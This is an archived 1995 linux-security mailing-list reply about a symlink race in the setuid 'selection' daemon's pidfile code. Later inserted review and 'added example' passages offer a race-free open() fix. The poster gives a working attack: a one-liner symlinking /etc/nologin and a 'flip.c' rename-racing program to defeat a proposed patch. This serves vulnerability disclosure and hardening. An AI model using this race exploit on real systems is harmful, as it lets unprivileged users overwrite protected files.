[331] in linux-security and linux-alert archive
Re: problem with selection
daemon@ATHENA.MIT.EDU (R.E.Wolff@et.tudelft.nl)
Mon Aug 28 18:01:52 1995
To: linux-security@tarsier.cv.nrao.edu
Date: Mon, 28 Aug 1995 13:00:23 +0200 (MET DST)
In-Reply-To: <m0smBb1-00018YC@pandemonium.saar.de> from "Thomas Weber" at Aug 26, 95 05:07:46 am
From: R.E.Wolff@et.tudelft.nl
> This patch seems to fix the problem:
>
> - --- selection-1.7-original/selection.c Tue Aug 2 07:51:45 1994
> +++ selection-1.7/selection.c Sat Aug 26 02:26:12 1995
> @@ -125,6 +125,12 @@
> if (fork())
> exit(0);
> setsid();
> +
> + if (unlink (PIDFILE) && (ENOENT != errno)) {
> + fprintf(stderr, "%s: Could not unlink PID file `%s', terminating.\n",
> + progname, PIDFILE);
> + exit(1);
> + }
>
> if ((fp = fopen(PIDFILE, "w")) != (FILE *)NULL) {
> fprintf(fp, "%d\n", getpid());
>
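Review bot: the new `+ if (unlink (PIDFILE) && (ENOENT != errno))` guard and the unchanged `fopen(PIDFILE, "w")` below it are two separate system calls, so there is still a window in which a symlink placed at PIDFILE after the unlink is followed by the fopen; removing whatever is there first does not make the later open safe. Suggest replacing the unlink/fopen pair with a single open(PIDFILE, O_WRONLY|O_CREAT|O_EXCL, 0644) (fdopen() the descriptor if a FILE* is wanted), so that any existing path, symlink included, makes the open fail instead of being followed, or keep the pidfile in a directory that only the daemon's own user can write to. The guard also uses errno, so the file needs <errno.h> if it does not already include it.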
I'm starting to get wildly annoyed at people who think they can
do security checks in setuid programs.
It is NOT possible to first perform a security check and then
open the file just like before. I repeat: "IT IS NOT POSSIBLE".
----------------------------------------------------------------------
|| I say again: "IT IS NOT POSSIBLE!!!!". ||
----------------------------------------------------------------------
(please forgive my shouting.... :-)
If your patch is installed, I simply do:
cd /tmp;ln -s /etc/nologin .;flip nologin PIDFILE &
^^^^^^^ whatever that is....
before running the previously published exploitation method. It now only
has a 50% chance of succeeding. Bummer.
(because of the unlink in the preceding program, you might have to modify
the attack to create/delete the symlinks as fast as you can instead of
moving them around.)
"flip" is the following program:
/* "flip.c" (C) R.E.Wolff@et.tudelft.nl */
/* Written on Mon Aug 28 +/- 10:00 MDT 1995,
   gcc -Wall gave no warnings/errors first compile run :-) (worked too :-) */
#include <stdio.h>
#include <stdlib.h>     /* exit() */
#include <unistd.h>

/* Rename argv[1] to argv[2] and back again, as fast as the kernel allows,
   until killed. */
int main (int argc, char **argv)
{
    if (argc != 3) {
        fprintf (stderr, "usage: %s name1 name2\n", argv[0]);
        exit (1);
    }
    while (1)
    {
        rename (argv[1], argv[2]);
        rename (argv[2], argv[1]);
    }
    exit (0);
}
Roger.
--
* legal notice: Microsoft Network is prohibited from redistributing this *
* work in any form, in whole or in part without a license. License to *
* distribute this work is available to Microsoft at $499. Transmission *
* without permission constitutes an agreement to these terms. *
*------------------------------------ Modified from Felix von Leitner ---*
** EMail: R.E.Wolff@et.tudelft.nl ** Tel +31-15-783643 or +31-15-137459 **
*** http://einstein.et.tudelft.nl/~wolff/ (my own homepage) ***
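Added example, not code from this thread or from selection-1.7: the race-free way to claim the pidfile that the objection above points to, in C. Instead of unlink() followed by fopen(), the path is opened once with O_CREAT|O_EXCL|O_NOFOLLOW and the result is checked through fstat() on the descriptor, so there is no check-then-open window. The names write_pidfile() and demo() are chosen here; it assumes a POSIX open(2) with O_NOFOLLOW (a Linux flag that postdates the 1995 kernels discussed) and a writable /tmp for the constructed scenario.

```c
#define _GNU_SOURCE            /* for O_NOFOLLOW and mkdtemp() on glibc */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Create the pidfile in one step instead of unlink-then-fopen. O_CREAT|O_EXCL
 * refuses any existing path (a planted symlink included), O_NOFOLLOW refuses
 * symlinks outright, and fstat() inspects the object actually opened rather
 * than the path. Returns 0 on success, -1 if the path could not be claimed. */
int write_pidfile(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0644);
    if (fd < 0) return -1;                    /* something already sits there */
    struct stat st;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1) {
        close(fd); return -1;
    }
    char buf[32];
    int n = snprintf(buf, sizeof buf, "%d\n", (int)getpid());
    if (n < 0 || write(fd, buf, (size_t)n) != n) {
        close(fd); unlink(path); return -1;
    }
    close(fd);
    return 0;
}

/* Constructed scenario in a fresh temporary directory: a clean path succeeds,
 * a second attempt on it fails, and a symlink planted at the path (the
 * situation from the thread) is refused rather than followed. Returns 1 if all hold. */
int demo(void)
{
    char dir[] = "/tmp/pidfile-demo-XXXXXX";
    if (mkdtemp(dir) == NULL) return 0;
    char pidpath[64], target[64], planted[64];
    snprintf(pidpath, sizeof pidpath, "%s/pid", dir);
    snprintf(target, sizeof target, "%s/victim", dir);
    snprintf(planted, sizeof planted, "%s/planted", dir);
    int ok = write_pidfile(pidpath) == 0;     /* fresh path: claimed */
    ok = ok && write_pidfile(pidpath) == -1;  /* already exists: refused */
    ok = ok && symlink(target, planted) == 0; /* symlink at the pidfile path */
    ok = ok && write_pidfile(planted) == -1;  /* refused, not followed */
    ok = ok && access(target, F_OK) != 0;     /* link target never created */
    unlink(planted); unlink(pidpath); rmdir(dir);
    return ok;
}
```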